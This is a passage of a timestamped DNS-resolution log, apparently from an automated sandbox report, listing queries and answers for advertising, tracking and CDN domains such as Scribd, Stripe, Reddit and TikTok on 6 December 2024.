                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076284885 CET1.1.1.1192.168.2.160xb026No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076488972 CET1.1.1.1192.168.2.160xd647No error (0)b1sync.zemanta.comb1-use1.zemanta.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076488972 CET1.1.1.1192.168.2.160xd647No error (0)b1-use1.zemanta.comzemanta-nychi2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076488972 CET1.1.1.1192.168.2.160xd647No error (0)zemanta-nychi2.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076488972 CET1.1.1.1192.168.2.160xd647No error (0)nydc1.outbrain.org70.42.32.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.076500893 CET1.1.1.1192.168.2.160x7d67No error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.145828962 CET1.1.1.1192.168.2.160x62d2No error (0)mid.rkdms.com54.198.45.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.145828962 CET1.1.1.1192.168.2.160x62d2No error (0)mid.rkdms.com52.21.47.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.219600916 CET1.1.1.1192.168.2.160x3f5dNo error (0)d.turn.comd-ams1.turn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.857440948 CET1.1.1.1192.168.2.160xf305No error (0)imgv2-1-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.857440948 CET1.1.1.1192.168.2.160xf305No error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.857440948 CET1.1.1.1192.168.2.160xf305No error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.857440948 CET1.1.1.1192.168.2.160xf305No error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.857440948 CET1.1.1.1192.168.2.160xf305No error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.864268064 CET1.1.1.1192.168.2.160xfa68No error (0)imgv2-1-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:30.944073915 CET1.1.1.1192.168.2.160xde07No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:30.944073915 CET1.1.1.1192.168.2.160xde07No error (0)platform.twitter.map.fastly.net151.101.120.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:30.947187901 CET1.1.1.1192.168.2.160x5a5eNo error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.027040005 CET1.1.1.1192.168.2.160xcde6No error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.028244972 CET1.1.1.1192.168.2.160xb23No error (0)rp.liadm.comlivepixel-production.bln.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.028244972 CET1.1.1.1192.168.2.160xb23No error (0)livepixel-production.bln.liveintent.com44.221.168.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.028244972 CET1.1.1.1192.168.2.160xb23No error (0)livepixel-production.bln.liveintent.com50.16.43.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.028244972 CET1.1.1.1192.168.2.160xb23No error (0)livepixel-production.bln.liveintent.com44.195.149.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.028244972 CET1.1.1.1192.168.2.160xb23No error (0)livepixel-production.bln.liveintent.com23.21.229.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.028244972 CET1.1.1.1192.168.2.160xb23No error (0)livepixel-production.bln.liveintent.com52.54.248.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.028244972 CET1.1.1.1192.168.2.160xb23No error (0)livepixel-production.bln.liveintent.com54.160.73.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.028244972 CET1.1.1.1192.168.2.160xb23No error (0)livepixel-production.bln.liveintent.com3.214.107.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.028244972 CET1.1.1.1192.168.2.160xb23No error (0)livepixel-production.bln.liveintent.com3.82.168.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.173995972 CET1.1.1.1192.168.2.160x9d92No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.173995972 CET1.1.1.1192.168.2.160x9d92No error (0)scontent.xx.fbcdn.net157.240.195.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.175707102 CET1.1.1.1192.168.2.160x992cNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.175707102 CET1.1.1.1192.168.2.160x992cNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.175707102 CET1.1.1.1192.168.2.160x992cNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.204076052 CET1.1.1.1192.168.2.160xd095No error (0)imgv2-2-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.218422890 CET1.1.1.1192.168.2.160x5cceNo error (0)imgv2-2-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.218422890 CET1.1.1.1192.168.2.160x5cceNo error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.218422890 CET1.1.1.1192.168.2.160x5cceNo error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.218422890 CET1.1.1.1192.168.2.160x5cceNo error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.218422890 CET1.1.1.1192.168.2.160x5cceNo error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.748442888 CET1.1.1.1192.168.2.160xa671No error (0)js.stripe.comdexeqbeb7giwr.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.748442888 CET1.1.1.1192.168.2.160xa671No error (0)dexeqbeb7giwr.cloudfront.net216.137.52.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.748442888 CET1.1.1.1192.168.2.160xa671No error (0)dexeqbeb7giwr.cloudfront.net216.137.52.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.748442888 CET1.1.1.1192.168.2.160xa671No error (0)dexeqbeb7giwr.cloudfront.net216.137.52.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.748442888 CET1.1.1.1192.168.2.160xa671No error (0)dexeqbeb7giwr.cloudfront.net216.137.52.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.748979092 CET1.1.1.1192.168.2.160x16ffNo error (0)js.stripe.comstripecdn.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.777292967 CET1.1.1.1192.168.2.160xc36dNo error (0)imgv2-1-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.777957916 CET1.1.1.1192.168.2.160x76e8No error (0)imgv2-1-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.777957916 CET1.1.1.1192.168.2.160x76e8No error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.777957916 CET1.1.1.1192.168.2.160x76e8No error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.777957916 CET1.1.1.1192.168.2.160x76e8No error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.777957916 CET1.1.1.1192.168.2.160x76e8No error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.746597052 CET1.1.1.1192.168.2.160x7055No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.746784925 CET1.1.1.1192.168.2.160xc229No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.746784925 CET1.1.1.1192.168.2.160xc229No error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.746784925 CET1.1.1.1192.168.2.160xc229No error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.746784925 CET1.1.1.1192.168.2.160xc229No error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.746784925 CET1.1.1.1192.168.2.160xc229No error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.809660912 CET1.1.1.1192.168.2.160xa5cfNo error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.809660912 CET1.1.1.1192.168.2.160xa5cfNo error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.810060024 CET1.1.1.1192.168.2.160x13eaNo error (0)bat-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.810060024 CET1.1.1.1192.168.2.160x13eaNo error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.810060024 CET1.1.1.1192.168.2.160x13eaNo error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.812172890 CET1.1.1.1192.168.2.160x341No error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.812172890 CET1.1.1.1192.168.2.160x341No error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.837162018 CET1.1.1.1192.168.2.160xd70eNo error (0)cdn.pdst.fm35.244.142.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.906584978 CET1.1.1.1192.168.2.160xd53eNo error (0)utt.impactcdn.com35.186.249.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.188414097 CET1.1.1.1192.168.2.160x966No error (0)browser.sentry-cdn.com151.101.194.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.188414097 CET1.1.1.1192.168.2.160x966No error (0)browser.sentry-cdn.com151.101.66.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.188414097 CET1.1.1.1192.168.2.160x966No error (0)browser.sentry-cdn.com151.101.2.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.188414097 CET1.1.1.1192.168.2.160x966No error (0)browser.sentry-cdn.com151.101.130.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.188800097 CET1.1.1.1192.168.2.160x79f7No error (0)cdn.optimizely.com104.18.66.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.188800097 CET1.1.1.1192.168.2.160x79f7No error (0)cdn.optimizely.com104.18.65.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.190160036 CET1.1.1.1192.168.2.160xb0a8No error (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.190638065 CET1.1.1.1192.168.2.160xd16dNo error (0)imgv2-2-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.190638065 CET1.1.1.1192.168.2.160xd16dNo error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.190638065 CET1.1.1.1192.168.2.160xd16dNo error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.190638065 CET1.1.1.1192.168.2.160xd16dNo error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.190638065 CET1.1.1.1192.168.2.160xd16dNo error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.191034079 CET1.1.1.1192.168.2.160x31c0No error (0)imgv2-2-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.692707062 CET1.1.1.1192.168.2.160xf185No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.692707062 CET1.1.1.1192.168.2.160xf185No error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.692707062 CET1.1.1.1192.168.2.160xf185No error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.692707062 CET1.1.1.1192.168.2.160xf185No error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.692707062 CET1.1.1.1192.168.2.160xf185No error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.694288015 CET1.1.1.1192.168.2.160x7c7bNo error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.767662048 CET1.1.1.1192.168.2.160x84c0No error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.777745962 CET1.1.1.1192.168.2.160x7731No error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.777745962 CET1.1.1.1192.168.2.160x7731No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.777745962 CET1.1.1.1192.168.2.160x7731No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.777745962 CET1.1.1.1192.168.2.160x7731No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.777745962 CET1.1.1.1192.168.2.160x7731No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.014596939 CET1.1.1.1192.168.2.160xa014No error (0)cdn.pdst.fm35.244.142.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.089876890 CET1.1.1.1192.168.2.160x9d22No error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.089876890 CET1.1.1.1192.168.2.160x9d22No error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.090812922 CET1.1.1.1192.168.2.160x666aNo error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.090812922 CET1.1.1.1192.168.2.160x666aNo error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.118438959 CET1.1.1.1192.168.2.160xa050No error (0)pixels.spotify.comedge-web.dual-gslb.spotify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.118438959 CET1.1.1.1192.168.2.160xa050No error (0)edge-web.dual-gslb.spotify.com35.186.224.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.154591084 CET1.1.1.1192.168.2.160xc303No error (0)utt.impactcdn.com35.186.249.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.226180077 CET1.1.1.1192.168.2.160x2753No error (0)pixels.spotify.comedge-web.dual-gslb.spotify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.380942106 CET1.1.1.1192.168.2.160x58baNo error (0)bat-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.380942106 CET1.1.1.1192.168.2.160x58baNo error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.380942106 CET1.1.1.1192.168.2.160x58baNo error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.796427011 CET1.1.1.1192.168.2.160x973fNo error (0)browser.sentry-cdn.com151.101.2.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.796427011 CET1.1.1.1192.168.2.160x973fNo error (0)browser.sentry-cdn.com151.101.130.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.796427011 CET1.1.1.1192.168.2.160x973fNo error (0)browser.sentry-cdn.com151.101.194.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.796427011 CET1.1.1.1192.168.2.160x973fNo error (0)browser.sentry-cdn.com151.101.66.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.917154074 CET1.1.1.1192.168.2.160x5b70No error (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.918570042 CET1.1.1.1192.168.2.160x3ef4No error (0)cdn.optimizely.com104.18.66.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.918570042 CET1.1.1.1192.168.2.160x3ef4No error (0)cdn.optimizely.com104.18.65.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585393906 CET1.1.1.1192.168.2.160x4ca7No error (0)m.stripe.networkprod-m-tree.stripe.networkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585393906 CET1.1.1.1192.168.2.160x4ca7No error (0)prod-m-tree.stripe.networkd1tcqh4bio8cty.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585393906 CET1.1.1.1192.168.2.160x4ca7No error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585393906 CET1.1.1.1192.168.2.160x4ca7No error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585393906 CET1.1.1.1192.168.2.160x4ca7No error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585393906 CET1.1.1.1192.168.2.160x4ca7No error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585987091 CET1.1.1.1192.168.2.160xd493No error (0)m.stripe.networkprod-m-tree.stripe.networkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585987091 CET1.1.1.1192.168.2.160xd493No error (0)prod-m-tree.stripe.networkd1tcqh4bio8cty.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585987091 CET1.1.1.1192.168.2.160xd493No error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585987091 CET1.1.1.1192.168.2.160xd493No error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585987091 CET1.1.1.1192.168.2.160xd493No error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.585987091 CET1.1.1.1192.168.2.160xd493No error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.586002111 CET1.1.1.1192.168.2.160x3076No error (0)m.stripe.networkprod-m-tree.stripe.networkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.586002111 CET1.1.1.1192.168.2.160x3076No error (0)prod-m-tree.stripe.networkstripecdn.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.586177111 CET1.1.1.1192.168.2.160xf8ecNo error (0)m.stripe.networkprod-m-tree.stripe.networkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.586177111 CET1.1.1.1192.168.2.160xf8ecNo error (0)prod-m-tree.stripe.networkstripecdn.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.715387106 CET1.1.1.1192.168.2.160xa87No error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.715387106 CET1.1.1.1192.168.2.160xa87No error (0)spdc-global.pbp.gysm.yahoodns.net54.246.144.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.715387106 CET1.1.1.1192.168.2.160xa87No error (0)spdc-global.pbp.gysm.yahoodns.net54.171.122.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.715401888 CET1.1.1.1192.168.2.160x427bNo error (0)t.co162.159.140.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.716902018 CET1.1.1.1192.168.2.160xee8eNo error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.716902018 CET1.1.1.1192.168.2.160xee8eNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.716902018 CET1.1.1.1192.168.2.160xee8eNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.716902018 CET1.1.1.1192.168.2.160xee8eNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
